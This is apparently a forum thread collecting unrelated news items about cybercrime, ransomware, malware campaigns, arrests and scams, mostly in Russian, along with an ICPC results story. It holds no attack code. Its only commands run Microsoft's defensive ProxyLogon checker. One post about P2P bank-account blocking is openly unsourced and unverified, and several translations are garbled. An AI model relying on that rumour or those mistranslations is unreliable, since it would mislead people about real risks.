Злоумышленники BianLian [известны](https://www.cisa.gov/news- events/cybersecurity-advisories/aa23-136a) исследователям тем, что предпочитают использовать модифицированный бэкдор, уникальный для каждой жертвы, написанный в Go, а также как и использованием инструментов удаленного доступа, таких как AnyDesk, Atera, SplashTop и TeamViewer. Бэкдор отслеживается Microsoft под именем [BianDoor](https://www.microsoft.com/en- us/wdsi/threats/malware-encyclopedia- description?Name=Backdoor:Win64/BianDoor!MTB&threatId=-2147124525).
Источник:
https://thehackernews.com/2024/03/bianlian-threat-actors-exploiting.html
Полицейские и сотрудники ФСБ России задержали организаторов и активных участников криминальной организации, которые подозреваются в изготовлении и сбыте поддельных денег. Следователем ГСУ ГУ МВД России по Ростовской области возбуждено уголовное дело по признакам преступлений, предусмотренных частями 1 и 2 статьи 210 УК РФ.
«По версии следствия, преступное сообщество состояло из нескольких структурных подразделений и действовало на территории семи регионов Российской Федерации. Часть злоумышленников в арендованных квартирах наладила печать поддельных купюр с имитацией элементов защиты. Другие отвечали за их оптовый и розничный сбыт, как через постоянных покупателей, так и бесконтактным способом. Кроме того, фигуранты организовали работу онлайн-магазина в теневом сегменте Интернета, через который продавали криминальный товар. Покупатели оплачивали фальшивки криптовалютой, после чего получали координаты тайников-закладок. По имеющейся информации, организация действовала с августа 2018 года», - расскзала официальный представитель МВД России Ирина Волк.
Сопровождение расследования ведут оперативники ГУЭБиПК МВД России, их коллеги из нескольких российских регионов, ГУУР МВД России и сотрудники ФСБ России. При поддержке Росгвардии они задержали подозреваемых на территории города Москвы, Московской, Белгородской и Ленинградской областей, республик Дагестан и Крым. По местам их проживания, а также в арендованных квартирах проведено более ста обысков.
«Обнаружены купюры с признаками подделки на сумму более 20 млн рублей, металлическое клише, оборудование и заготовки для печати, расходные материалы и другие предметы, имеющие доказательственное значение.
Изъятое направлено для проведения экспертизы. 24 фигурантам по ходатайству следователя избрана мера пресечения в виде заключения под стражу.
Устанавливаются все возможные эпизоды и соучастники противоправной деятельности, а также каналы сбыта поддельных денежных знаков», - сообщила Ирина Волк.
В субботу, 3 сентября, неизвестные взломали принадлежащий правительству Южной Кореи YouTube-канал, переименовали его в SpaceX Invest и транслировали сфабрикованные видео с Илоном Маском, обсуждающим криптовалюты.
Сотрудник министерства культуры, спорта и туризма Южной Кореи рассказал агентству, что контроль над каналом восстановили в тот же день. На момент написания он не доступен. По словам чиновника, хакерам удалось скомпрометировать учетные данные аккаунта.

В Google подтвердили Yonhap, что правительственный канал действительно взломали. В компании добавили, что занимаются расследованием инцидента.
В воскресенье в СМИ также появилась информация о взломе Twitter-аккаунта венесуэльского подразделения консалтинговой компании PricewaterhouseCoopers (PwC). В ночь на 4 сентября он начал публиковать ссылки на сайт, якобы принадлежащий Ripple.
Сайт продвигает «раздачу» криптовалюты XRP. Чтобы получить актив пользователям предлагают пройти по вредоносной ссылке. На момент написания фишинговые твиты остаются на странице PwC Venezuela.
source: en.yna.co.kr/view/AEN20220903001700325
MBDA – ведущий европейский разработчик и производитель ракетных систем. Была образована путём объединения Aérospatiale-Matra Missiles, Finmeccanica и Matra BAe Dynamics в декабре 2001 года.
В сообщении Adrastea на русскоязычном хакерском форуме XSS говорится, что хакеры нашли критическую уязвимость в сетевой инфраструктуре итальянского филиала MBDA, которая позволила им украсть 60 Гб данных. По словам злоумышленников, им удалось скачать проектную документацию систем ПВО, ракетных систем и систем береговой защиты, презентации, переписки с другими оборонными подрядчиками и другую конфиденциальную информацию.
Сообщение о взломе на хакерском форуме

Если факт взлома подтвердится, то это будет уже второй случай за две недели, когда критическая инфраструктура Италии попадает под прицел хакеров. На прошлой неделе группировка LockBit заявила, что взломала налоговую службу Италии . Итальянские власти начали расследование. Однако Sogei, государственная IT-компания, заявила, что не может подтвердить факт кибератаки.
Новый шифровальщик под названием Vovalex распространяется как пиратское
программное обеспечение, которое выдает себя за популярные утилиты Windows,
например, CCleaner.
Действия вымогателей сводятся к одной функции: зашифровать файлы устройства, а
затем оставить сообщение с требованием выкупа в той или иной форме.
Хотя Vovalex не отличается сложностью реализации, но он может быть первым
шифровальщиком, написаным на языке программирования D.
"D является кульминацией десятилетего опыта реализации компиляторов для многих различных языков, и пытается построить крупные проекты, используя эти языки. D черпает вдохновение из этих других языков (особенно С++) и закаляет его с опытом и реальной практичности мира", говорится на веб-сайте Dlang.
Click to expand...
Поскольку разработчики вредоносных программ обычно не используют Dlang, специалисты считают, что злоумышленники используют программное обеспечение безопасности для обхода обнаружения.
Vovalex был впервые обнаружен MalwareHunterTeam, который поделился образцом "VirusTotal " с bleepingcomputer[.]
Образец, проанализированный BleepingComputer, распространяется как копия утилиты CCleaner для Windows, как видно из файла NFO в комплекте ниже.
При выполнении, шифровальщик запустит официальный установщик CCleaner и скопирует себя выбрав случайное имя файла в %Temp%.
Ransomware начинает шифровать файлы на диске и присваивает расширение .vovalex зашифрованным файлам.
Когда все это будет сделано, ransomware создаст сообщение под названием README.VOVALEX.txt на рабочем столе, в котором они требуют перечислить 0,5 XMR (Monero) для получения дешифроватора. Эта сумма равна примерно $69 по текущим ценам.
На данный момент неизвестно, могут ли исследователи расшифровать эти файлы без выкупа.
В P2P-обменниках появился новый вид скама — он стал возможен из-за поправок в законе о платежных системах от 25 июля.
По новым правкам ЦБ может легко заблокировать счета во всех банках — достаточно одной выдуманной жалобы от мошенника, что вы занимаетесь махинациями.
Прецедент уже есть: парень решил вывести крипту с Bybit через P2P. На следующий день ему звонят из банка и говорят, что деньги на карту ему прислали ошибочно — так заявил отправитель-мошенник.
Герой истории деньги возвращать отказался и попытался доказать, что всё было честно. Не помогло: через два дня все банковские счета заблокировали, парня внесли в «черный список ЦБ» и отказываются выдавать наличку.
И нажаловаться так может кто угодно. Единственный вариант — обменивать всё в наличке по старинке.
З,Ы это не точно, инфу надо проверить. сурса нет
Новый троян для iOS и Android, получивший название GoldPickaxe, использует социальную инженерию, вынуждая жертв сканировать свои лица и документы, удостоверяющие личность. Исследователи Group-IB полагают, что потом эти данные используются для создания дипфейков и несанкционированного доступа к банковским счетам.
Подчеркивается, что малварь обманом, помощью социальной инженерии заставляет людей раскрыть свое лицо. То есть GoldPickaxe не перехватывает данные Face ID и не использует какие-либо уязвимости в мобильных ОС.
По словам исследователей, новая малварь является частью вредоносного арсенала
китайской хак-группы GoldFactory, которая также ответственна за создание таких
угроз как GoldDigger, GoldDiggerPlus и GoldKefu. Атаки этой группировки обычно
направлены на Азиатско-Тихоокеанский регион (в частности, на Таиланд и
Вьетнам).

Сообщается, что распространение GoldPickaxe началось в еще октябре 2023 года, и малварь активна до сих пор.
Как правило, жертвы получают фишинговые письма или сообщения в мессенджере
LINE, написанные на их родном языке. В них мошенники выдают себя за
представителей государственных органов и служб, обманом вынуждая пользователей
установить вредоносные приложения. Например, Digital Pension, размещенное на
сайтах, маскирующихся под официальный магазин Google Play.

При этом пользователям iOS (iPhone) злоумышленники предлагали перейти по URL-
адресу Apple TestFlight (платформа помощи разработчикам в распространении
бета-версий приложений для тестирования в iOS), что позволяло обойти защитные
механизмы. Когда Apple удалила TestFlight-приложение, злоумышленники
переключились использование Mobile Device Management (MDM), что позволяло им
получить контроль над устройствами целей.
После установки трояна на мобильное устройство он работает в полуавтономно, в
основном производя все манипуляции в фоновом режиме. Исследователи пишут, что
малварь перехватывала биометрические данные о лице жертвы, входящие SMS-
сообщения, запрашивала документы, удостоверяющие личность, и проксировала
сетевой трафик через зараженное устройство с помощью MicroSocks.

Малварь запрашивает фото
На iOS-устройствах GoldPickaxe использует канал веб-сокета для получения следующих команд:
При этом в Group-IB отмечают, что Android-версия малвари совершает даже больше
вредоносных действий, так как устройства Apple обладают более строгими
защитными ограничениями.

Варианты атак на iOS-устройства
Например, на Android GoldPickaxe может выполнять команды для доступа к SMS, навигации по файловой системе, имитировать касания экрана, воровать 100 последних фотографий из альбома жертвы, загружать и устанавливать дополнительные пакеты, а также отправлять фальшивые уведомления. Кроме того, на Android троян использует более 20 фальшивых приложений для маскировки.
Полученные таким образом документы и биометрические данные жертв используются операторами GoldPickaxe для последующего создания дипфейков и банковского мошенничества, полагают в Group-IB. Дело в том, что еще в прошлом году полиция Таиланда предупреждала о таких мошеннических схемах. Многие финансовые учреждения в стране стали использовать биометрические проверки для транзакций свыше определенной суммы (а Вьетнам [намерен](https://tuoitrenews.vn/news/business/20231015/vietnam-central-bank- plans-to-require-face-authentication-for-money-transfer-in-2024/76166.html) ввести аналогичные ограничения к апрелю 2024 года), поэтому злоумышленники начали охотиться за биометрическими данными пользователей.
«GoldFactory — изобретательная команда [хакеров], в рукаве у которой имеется множество трюков: выдача себя за других людей, кейлоггинг через Accessibility, поддельные банковские сайты и банковские оповещения, фальшивые экраны вызовов, сбор информации о личности жертвы и данных для распознавания лиц, — пишут исследователи. — Их способность одновременно разрабатывать и распространять варианты вредоносного ПО, адаптированные для разных регионов, свидетельствует о тревожном уровне изощренности».
Click to expand...
After recently announcing the end of the operation, the administrator of Ziggy ransomware is now stating that they will also give the money back.
It appears that this is a planned move since the admin shared the "good news" a little over a week ago, but gave no details.
Ziggy ransomware shut down in early February. In a short announcement, the
administrator of the operation said that they were “sad” about what they did
and that they “decided to publish all decryption keys.”
They followed through the next day, on February 7, offering an SQL file with
922 decryption keys that victims could use to unlock their files.
The admin also made available a decryption tool to make the process easier, along with the source code for a decryptor that does not need an internet connection to work.
On March 19, the Ziggy ransomware administrator said that they also wanted to return the money to the victims that paid the ransom. Today, after a week of silence, the admin said that they were ready to revert payments.
Victims should contact the admin at a given email address (ziggyransomware@secmail.pro) with the proof of their payment in bitcoin and the computer ID, and the money would be returned to the victim’s bitcoin wallet in about two weeks.
Ransomware victims get a ransom note with instructions on how to contact cybercriminals to negotiate a payment. Typically, the payment is negotiated in fiat but paid in Bitcoin.
source:
Michael Gillespie
Bitcoin price has been on ascending route for the past three months, and its
price at the moment of writing is close to $55,000.
On the day Ziggy ransomware decryption keys became public, Bitcoin price was
around $39,000. Five days before the admin announced that they would return
the money, Bitcoin spiked above $61,000. Given the price difference, the admin
makes a profit at the current Bitcoin price.
The Ziggy ransomware administrator told BleepingComputer that they lived in a
“third-world country” and that their motivation for creating the locker was
financial.
The admin’s recent actions seem to be driven by guilt and the worry that law
enforcement might get them, given the disruption of much larger operations
like Emotet and Netwalker ransomware.
Microsoft has released a PowerShell script that admins can use to check whether the recently disclosed ProxyLogon vulnerabilities have hacked a Microsoft Exchange server.
On March 2nd, Microsoft released out-of-band emergency security updates to fix
four zero-day vulnerabilities actively used in attacks against Microsoft
Exchange. These vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857,
CVE-2021-26858, CVE-2021-27065.
When chained together, these vulnerabilities are known as
'ProxyLogon' and allow the threat actors to perform
remote code execution on publicly exposed Microsoft Exchange servers utilizing
Outlook on the web (OWA).
As part of these attacks, the threat actors installed web shells that allowed the attackers to control the server and access the internal network.
These attacks have been attributed to a China state-sponsored hacking group known as HAFNIUM.
When disclosing these vulnerabilities, Microsoft provided a list of commands that Exchange administrators could use to check if a server was hacked.
These commands would need to be executed manually to check for indicators of compromise (IOC) in Exchange HttpProxy logs, Exchange log files, and Windows Application event logs.
Yesterday, Microsoft released a PowerShell script on the Microsoft Exchange support engineer's GitHub repository named Test- ProxyLogon.ps1 to automate these tasks for the administrator.
Microsoft 's Test-
ProxyLogon.ps1 script
Microsoft provides the following instructions on using the script to check a
single Microsoft Exchange server or all servers in your organization.
To check all Exchange servers in your organization and save the logs to the desktop, you would enter the following command from Exchange Management Shell:
Get-ExchangeServer | .\Test-ProxyLogon.ps1 -OutPath $home\desktop\logs
If you only want to check the local server and save logs, you would enter the
following command:
.\Test-ProxyLogon.ps1 -OutPath $home\desktop\logs
Finally, to only test the local server and display the results without saving
them, you can run the following command:
.\Test-ProxyLogon.ps1
The US Cybersecurity and Infrastructure Security Agency (CISA) strongly
recommends that all organizations utilize this script to check if their
servers have been compromised.
"CISA is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the Test- ProxyLogon.ps1 script—as soon as possible—to help determine whether their systems are compromised," CISA advises in a new [advisory](https://us- cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool- exchange-server-vulnerabilities).
Furthermore, as it has been reported that over 30,000 Exchange Servers have been compromised in this attack, all organizations must prioritize installing the new Exchange security updates and ensuring they have not been targeted in these attacks.
Пражские уголовные следователи разоблачили мошенников, которые собрали более 1,1 миллиона крон (около 44 тысяч евро) от жертвователей в рамках сбора средств для Украины под флагом Фонда JSME LIDÉ ("Мы – люди").
Об этом сообщила в субботу пресс-секретарь пражской полиции Ева Кропачова, сообщает "Европейская правда" со ссылкой на Novinky.
В течение нескольких месяцев они собирали деньги в копилки в разных местах в универмагах и супермаркетах Праги и близлежащих муниципалитетов региона Центральная Чехия.
По данным полиции, мошенники злоупотребляли собранными пожертвованиями. Вместо того, чтобы помогать Украине, они путешествовали по миру. Главному организатору, которому 18 лет, грозит до восьми лет заключения, сообщила Кропачева.
"Они использовали деньги на собственные нужды, путешествовали за них по миру, оставались за границей, но также оплачивали общие расходы, такие как аренда жилья и питание. Таким образом они злоупотребляли сложным положением людей, пострадавших от войны в Украине, и желанием граждан сделать свой вклад, чтобы помочь этой стране", – добавила Кропачева.
Во время обысков в домах полиция изъяла наличные в размере сотен тысяч крон, банковские ячейки, в которые мошенники снимали деньги, и много документов. По словам пресс-секретаря, полиция пока доказала, что нанесенный ущерб составляет 1,1 миллиона крон, но на самом деле он может быть в разы больше.
Фонд JSME LIDÉ зарегистрирован в чешском коммерческом реестре, но не имеет веб-сайта и аккаунтов в социальных сетях.
На прошлой неделе полиция арестовала предполагаемого главного организатора фейкового сбора средств по подозрению в мошенничестве. В то же время было возбуждено уголовное дело против одного юридического лица, которое также фигурировало в мошенничестве.
видео принятия:
novinky.cz/clanek/krimi-podvodnici-vybrali-pres-milion-pro-ukrajinu-za-penize-
cestovali-po-svete-40489794
Продажи, вымогательства, мошенничество - деятельность Санду Диакону на поверхности.
Санду Диакону, управляющий нелегальным онлайн-рынком E-Root, был экстрадирован в США для предстоящего суда, где ему грозит максимальное заключение в тюрьму на срок до 20 лет за продажу доступа к скомпрометированным компьютерам.
Диакону, гражданин Молдовы, был арестован в Великобритании в мае 2021 года, пытаясь покинуть страну после того, как власти конфисковали домены E-Root в конце 2020 года.
Прошлый месяц Диакону дал согласие на экстрадицию в США по обвинениям в мошенничестве с использованием электронных средств связи, отмывании денег, компьютерном мошенничестве и мошенничестве с использованием средств доступа.
Кроме лишения свободы, правоохранительные органы США требуют конфискации преступных доходов, полученных Диакону в результате незаконной деятельности, размер которых еще предстоит определить.
О рынке E-Root
E-Root был нелегальным рынком, предлагавшим доступ к взломанным компьютерам по всему миру в обмен на криптовалюту. Данные, полученные в ходе расследования, показывают, что более 350 000 компрометированных систем были выставлены на продажу на рынке, включая компьютеры из множества отраслей, а также по меньшей мере одну правительственную систему в Тампе.
Покупателям предоставлялись инструменты для поиска по доступным предложениям, используя различные критерии, такие как ценовой диапазон, регион, интернет- поставщик, операционная система, доступ по RDP или SSH и многие другие.
E-Root функционировал на широко распределенной сети для обеспечения устойчивости и уклонения от преследования, применяя методы защиты для скрытия настоящих личностей продавцов, покупателей и администраторов.
Также рынок обслуживал специализированный обмен криптовалют, позволяя пользователям конвертировать Bitcoin в Perfect Money, законный сервис электронных транзакций.
По данным Министерства юстиции США, было множество подтверждений того, что доступ, купленный через E-Root, использовался для киберпреступной деятельности, включая атаки с использованием вымогательского ПО.
Министерство юстиции США заявило, что многие жертвы подвергались атакам с использованием вымогательского ПО, и некоторые из украденных учетных данных, представленных на рынке, были связаны со схемами мошенничества с украденными налоговыми данными.
Диакону пока не признал себя виновным по предъявленным обвинениям и считается невиновным до момента доказательства его вины.
source: justice[.]gov/usao-mdfl/pr/moldovan-charged-arrested-and-extradited- administration-site-involved-illicit-sale
В Челябинске хакер получил срок за взлом и продажу личных кабинетов россиян
Курчатовский суд Челябинска приговорил местного жителя к 1,5 годам условно за
взлом и продажу личных кабинетов россиян.
Хакера признали виновным по статьям 271 («Неправомерный доступ к компьютерной
информации») и 273 («Создание, использование и распространение вредоносных
компьютерных программ») УК РФ.
Установлено, что мужчина с помощью программного обеспечения получал доступ к личным кабинетам на различных сайтах, в том числе госучреждений и банков, а после продавал их в мессенджере. Стоимость взломанного кабинета составляла от 400 долларов до 2 тысяч долларов в виде криптовалюты.
Уголовные дела против хакера были возбуждены 20 сентября 2023 года.
Всего, как отметили за 2023 год в регионе было осуждено четверо хакеров и более 15 хакеров в настоящее время находятся под следствием. Выявлено за год 25 компьютерных атак, в результате которых злоумышленники пытались получить доступ к ресурсам правительства, заксобрания и предприятий оборонного и промышленного комплекса Челябинской области.
Девушка перевела им все деньги, золотые часы «Карьте» и 3 кг золота.
Девушке позвонили якобы из МТС и предложили продлить договор, но для этого нужно было назвать код из СМС, который на самом деле был кодом от «Госуслуг».
Далее всё по-классике: студентке несколько раз звонили мошенники, представляясь ФСБ, «Госуслугами» и «Росфинмониторингом». Её убедили, что она обвиняется в пособничестве терроризму.
Ей предложили снять обвинения, если она будет сотрудничать: девушка купила новый телефон, перевела все свои накопления на «безопасный счёт», вместе с мошенниками по видеосвязи подбирала код от сейфа дома, в нём же взяла 3 золотых слитка, часы и 100 000 евро, которые позже отдала «агентам».
Затем скамеры переключились на бабушку студентки, с которой хотели поиметь 10 млн рублей, но она распознала мошенников и ничего им не перевела. Девушка услышала в трубке знакомый голос и поняла, что стала жертвой мошенников.
APT Группа из Китая, известная как Volt Typhoon , попыталась восстановить ботнет, нацеленный на критическую инфраструктуру США, в течении недели после того, как он был раскрыт ФБР, но им помешала группа исследователей по кибербезопасности.
На прошлой неделе Министерство юстиции объявило, что ФБР отключило сотни маршрутизаторов для домашних офисов (SOHO), подключенных к ботсети KV Volt Typhoon , которую они использовали для сокрытия интернет-трафика, связанного с ее вредоносной деятельностью.
Отключение ботнета произошло в декабре, спустя несколько месяцев после того, как впервые стали известны опасения относительно скрытых атак Volt Typhoon на критическую инфраструктуру. Исследователи из Black Lotus Labs компании Lumen заявили, что в течение следующего месяца они заблокировали соединения между скомпрометированными маршрутизаторами и серверами Volt Typhoon, предотвратив возобновление ботсети.
Хотя уничтожение ботнета является одной из немногочисленных побед над подобным типом угроз, поддерживаемой государством США, это не снизило значительных опасений властей относительно угрозы, которую представляет Volt Typhoon.
Вчера федеральные агентства США и директивы по кибербезопасности из четырех других стран раскрыли новые детали о группе, включая то, что она сохраняла доступ к некоторым целевым организациям как минимум в течение последних пяти лет.
' Сосредоточенные' усилия группы по восстановлению ботнета
В сообщении от 7 февраля исследователи Black Lotus Labs из Lumen заявили, что
они наблюдали "краткий, но сосредоточенный период активности эксплуатации" в
дни после отключения ФБР, когда Volt Typhoon пытались восстановить свою
структуру С2 серверов и оживить ботнет.
_" В течение трех дней с 8 по 11 декабря 2023 года операторы ботнета KV нацелились на около 33% устройств NetGear ProSAFE в Интернете для повторной эксплуатации, было замечено всего 2100 отдельных устройств", - заявили исследователи.
"Несмотря на все усилия операторов ботсети, быстрое блокирование со стороны Lumen Technologies в сочетании с действиями, разрешенными судом ФБР, оказали значительное влияние на время работы, охват и устойчивость ботнета KV"._
Однако исследователи предупредили, что использование компрометированных маршрутизаторов и брандмауэров Volt Typhoon - это та тактика, которая которую специалисты больше всего ожидают, самый ожидаемый исход это то, что злоумышленники будут пытаться продолжать использовать подобную стратегию.
" В Интернете существует большое количество устройств, которые являются устаревшими и считаются устаревшими, но все еще достаточно хорошо функционируют, чтобы оставаться в обслуживании для конечных пользователей", - предупредили они.
" Злоумышленники будут продолжать нацеливаться на устройства средней и высокой пропускной способности в географических областях своих целей, поскольку пользователи вряд ли заметят влияние или обладают необходимыми инструментами мониторинга исследования для обнаружения заражения".
Volt Typhoon внедрялся в целевые системы на протяжении пяти лет
Тем временем, Агентство кибербезопасности и инфраструктуры (CISA) США
вместе с несколькими другими агентствами США и групамми по кибербезопасности в
Канаде, Великобритании, Австралии и Новой Зеландии опубликовали новое
предупреждение о Volt Typhoon, с рекомендациями по смягчению и предотвращения
возможного урона.
Агентства опубликовали два подробных информационных сообщения 7 февраля. Первое из них описывает угрозы, представляемые государственными APT групировками из Китайской Народной Республики (КНР), включаяVolt Typhoon , и способы их смягчения. Второе сообщение сосредоточено на использовании угроз (включая Volt Typhoon) методов как "Leaving Off The Land" (LOTL).
" В последние годы США наблюдали стратегический сдвиг в киберугрозах со стороны ПКР от фокуса на шпионаже к предварительной подготовке к возможным разрушительным кибератакам против критической инфраструктуры США", - говорится в заявлении CISA.
В первом отчете агентств описываются методы LOTL как характерная черта вредоносной деятельности Volt Typhoon при нападении на критические инфраструктуры.
_" Группа также полагается на действующие учетные записи и умело заметает следы, что в совокупности позволяет сохранять долгосрочную незамеченную устойчивость", _- говорится в отчете.
Срочные меры по смягчению
В отчете подчеркивается, что организации должны немедленно предпринять три
шага для смягчения деятельности Volt Typhoon:
Обновить операционки и серверное ПО, для IoT устройств, и приоритизировать
исправление критических уязвимостей в устройствах, которые часто
эксплуатируются Volt Typhoon.
Внедрить меры безопасности с многофакторной аутентификацией (MFA), устойчивой
к фишингу.
Убедиться, что включено логирование для приложений, включая логи подключений и
сетевых мониторов, а также бекапить логи на центральные системы.
Spoiler: Источник
<https://www.scmagazine.com/news/volt-typhoon-fails-to-revive-botnet-after- fbi-takedown>
Cybercriminals have created a fake Microsoft DirectX 12 download page to distribute malware that steals your cryptocurrency wallets and passwords.
Even though the site comes complete with a contact form, privacy policy, a
disclaimer, and a DMCA infringement page, there is nothing legitimate about
the website or the programs it distributes.
When users click on the Download buttons, they will be redirected to an
external page that prompts them to download a file. Depending on whether you
click on the 32-bit or 64-bit version, you will be offered a file named
'6080b4_DirectX-12-Down.zip'
[VirusTotal]
or '6083040a__Disclaimer.zip'
[VirusTotal].
What both of these files have in common is that they lead to malware that
tries to steal victims' files, passwords, and cryptocurrency wallets.
First discovered
by security researcher Oliver Hough, when
the fake DirectX 12 installers are launched, they will quietly download
malware from a remote site and execute it
This malware is an information-stealing malware that attempts to harvest a victim's cookies, files, information about the system, installed programs, and even a screenshot of the current desktop.
Harvesting data
from the infected computer
With the cryptocurrency craze in full swing, the malware developers also
attempt to steal a wide variety of cryptocurrency wallets for Windows
software, such as Ledger Live, Waves.Exchange, Coinomi, Electrum, Electron
Cash, BTCP Electrum, Jaxx, Exodus, MultiBit HD, Aomtic, and Monero.
Stealing
cryptocurrency wallets
All of the data is collected into a %Temp% folder, which the malware will zip
up and send back to the attacker. The attack can then analyze the data and use
it for other malicious activities.
Threat actors are increasingly creating fake websites, and in many cases far more convincing websites, to distribute malware.
In the past, BleepingComputer has reported on malware distributors creating fake sites promoting ProtonVPN, Windows system cleaners, and BleachBit that push password-stealing Trojans on unsuspecting visitors.
With the web continuing to be the wild west, it is vital to take a paranoid approach to download software and only install software from trusted sites or the developer's site.
As DirectX is a Microsoft feature, it makes sense that you should [only install it from Microsoft](https://support.microsoft.com/en-us/topic/how-to- install-the-latest-version-of-directx-d1f5ffa5-dae2-246c-91b1-ee1e973ed8c2) and that downloading it from anywhere else can likely lead you to trouble.
Киберполицейские Николаева разоблачили несовершеннолетнего из Днепропетровщины.
Фигурант предлагал в интернете за деньги услуги сватинга. Полицейские Николаевщины разоблачили злоумышленника и изъяли доказательства противоправной деятельности.
Оперативники киберполиции совместно со следователями отделения полиции №2 МРУП ГУНП в Николаевской области под процессуальным руководством Николаевской окружной прокуратуры разоблачили несовершеннолетнего жителя города Каменское Днепропетровской области, зарабатывавшего на сватинге.
Кроме того, злоумышленник совершал доксинг за деньги. Киберполицейские установили, что несовершеннолетний предлагал в мессенджерах найти информацию о личности и ее родных из открытых источников, а также осуществить кибербуллинг жертвы.
В дальнейшем подросток посылал клиентам отчеты о проделанной работе. Для скрытия своего местоположения фигурант сначала указывал стоимость услуг в российских рублях, однако впоследствии предоставлял заказчикам реквизиты украинских карточек для расчета в гривневом эквиваленте.
По данным следствия, в мае этого года парень направил на электронную почту одного из учебных заведений Николаева сообщение о заминировании с оскорбительным содержанием от чужого имени.
По указанному адресу прибыли сотрудники взрывотехнической и кинологической служб. Полицейские провели проверку территории и никаких опасных веществ или взрывных устройств не обнаружили.
Следственные отделения полиции №2 МРУП ГУНП в Николаевской области открыли уголовное производство по ч. 2 ст. 259 (Заведомо ложное сообщение об угрозе безопасности граждан, уничтожении или повреждении объектов собственности) Уголовного кодекса Украины.
Несмотря на попытки анонимизации, полицейские установили местонахождение фигуранта и провели санкционированный судом обыск по месту его жительства. Правоохранители изъяли компьютерную технику.
При осмотре устройств подтверждена причастность подростка к «заминированию» николаевского лицея. Также обнаружены группы в Telegram и Discord (система, в частности поддерживающая функцию онлайн-общения), в которых злоумышленник за денежное вознаграждение принимал заказы на рассылку ложных сообщений о минировании и публиковал прайс на свои «услуги».
Продолжаются следственные действия с целью проверки причастности злоумышленника к другим аналогичным преступлениям и установлению возможных его сообщников. Отрабатывается версия сотрудничества с агентами из России.
cyberpolice.gov.ua/media/uploads/2024/06/17/5f933401c72e34efc40764d2ffbadf9803833f080f4cac23a8d2535d688beb4d.06
Code:Copy to clipboard
https://www.bleepingcomputer[.]com/news/microsoft/all-windows-versions-can-now-block-admin-brute-force-attacks/
Один из ключевых деятелей теневого рынка Silk Road, который занимался продажей наркотиков через интернет, вчера был приговорен к 20 годам лишения свободы и выплате штрафа в размере 1,6 миллиона долларов.
Как сообщили местные прокуроры, Роджер Томас Кларк, 61-летний гражданин Канады, известный в сети под псевдонимом Variety Jones, консультировал Росса Ульбрихта, основателя Silk Road, по всем аспектам его деятельности. Ульбрихт называл Кларка своим «настоящим наставником», который вдохновлял его и помогал «создать бренд, которому люди могут доверять».
Кларк ранее уже отбывал тюремный срок после того, как был арестован в Таиланде в 2015 году и экстрадирован в США в 2018 году. Адвокат Кларка утверждал, что его клиент подвергался плохому обращению в тайской тюрьме и вопиющей медицинской халатности в тюрьме американской. Его слушание несколько раз откладывалось из-за пандемии, ограниченного доступа к юридическим материалам, а также травм и болезней, полученных в тюрьме.
39-летний Росс Ульбрихт, также известный как Dread Pirate Roberts, уже отбывает пожизненное заключение после того, как был осужден в 2015 году за управление Silk Road.
В период своего существования с 2011 по 2013 год Silk Road использовался тысячами наркоторговцев для распространения запрещённых веществ и других незаконных товаров и услуг более чем 100 тысячам покупателей и для отмывания сотен миллионов долларов от этих противоправных сделок.
По данным обвинения, Кларк рассказывал Ульбрихту о слабых местах в безопасности сайта, технической инфраструктуре, правилах, которые регулировали пользователей и продавцов платформы, а также о принципах продвижения и продаж наркотиков в сети.
Кларк также помог Ульбрихту разработать «обложку», чтобы создать видимость того, что Ульбрихт продал Silk Road. Он также собирал информацию для противодействия усилиям правоохранительных органов по расследованию предприятия.
Кроме того, Кларк предложил Ульбрихту заказать убийство одного из своих сотрудников, которое, впрочем, так и не было совершено, но Ульбрихт заплатил предполагаемому киллеру 80 тысяч долларов за работу, полагая, что она выполнена.
«Роджер Томас Кларк был центральной фигурой в помощи руководству Silk Road и в защите этой цифровой наркоимперии», — заявил Дамиан Уильямс, ответственный американский прокурор.
Кларк заявил, что его работа на Silk Road всегда была мотивирована политическим убеждением, что наркотики должны быть легализованы. Он утверждал, что сотни миллионов долларов в теневых сделках с наркотиками, которые он облегчил, были сравнительно безопаснее, чем сделки физические. В суде он сказал, что одновременно гордится и стыдится своего участия в деятельности Silk Road.
source: justice[.]gov/usao-sdny/pr/senior-adviser-operator-silk-road-online- black-market-sentenced-20-years-prison
Россия одержала победу в 47 мировом чемпионате по программированию ICPC. Первое место заняли студенты факультета компьютерных наук из НИУ ВШЭ. Помимо этого российским командам удалось взять золотые медали и в 46 финале, который проходил одновременно с 47.
Победа российских программистов
Студенты факультета компьютерных наук, основанного совместно Яндексом и НИУ ВШЭ одержали победу 47 финала всемирного чемпионата по программированию среди университетских команд ICPC (International Collegiate Programming Contest) за 2023 г. И получили золотые медали в 46 финале. Последние этапы чемпионата сразу за 2022-2023 гг. (46 и 47 финал, соответственно) проходили в египетском городе Луксор с 14 по 19 апреля 2024 г.
Команда-чемпион под названием FFTilted смогла обойти студентов из Пекинского университета, которые заняли первое место в финале 2022 г. Состоит отечественная команда из трех участников. Победу России обеспечили Фёдор Ромашов, Кирилл Кудряшов и Александр Бабин. Тренерами команды выступили Михаил Густокашин и Филипп Грибов.
Согласно правилам чемпионата, призовые места присуждаются 12 командам, а первенство определяется по количеству набранных в ходе соревнования очков. Российские программисты из команды Undertrained+Overpressured Максим Гороховский, Иван Сафонов и Тимофей Федосеев заняли третье место в 46-м финале и получили золотые медали. А Иван Сафонов стал единственным в истории трехкратным медалистом ICPC.
Другие призеры ICPC
В прошедших в Луксоре 46 и 47 финалах ICPC участвовало более 840 студентов — 170 университетов из 50 стран.
Чемпионы 47-го финала ICPC. Слева направо: Александр Бабин - участник. Кирилл Кудряшов - участник. Михаил Густокашин - тренер. Федор Ромашов - участник
Среди участников других российских вузов медали также получили студенты МФТИ — команда Yolki-palki: Тихон Евтеев, Денис Мустафин и Всеволод Нагибин, занявшие третье место в 47 финале. Пятое место в 46 финале чемпионата ICPC заняла команда MIPT Log-rank Conjecture из того же университета, в составе: Антон Садовничий, Дмитрий Григорьев, Александр Шеховцов.
Из иностранных команд золото получили команды из Массачусетского Института Технологий (США) и Оксфордского университета — они заняли второе и четвертое место в 46 финале. Серебро досталось участникам из Сеульского национального университета (шестое место, Республика Корея), Киевскому национальному университету имени Тараса Шевченко (7 место, Украина) и Университету Ватерлоо (8 место, США).
Бронзовые медали в 46 финале получили студенты Токийского университета (Япония), Университета Цинхуа (Китай), Нанкинского университета почты и телекоммуникаций (Китай) и Национального Тайваньского университета (Тайвань).
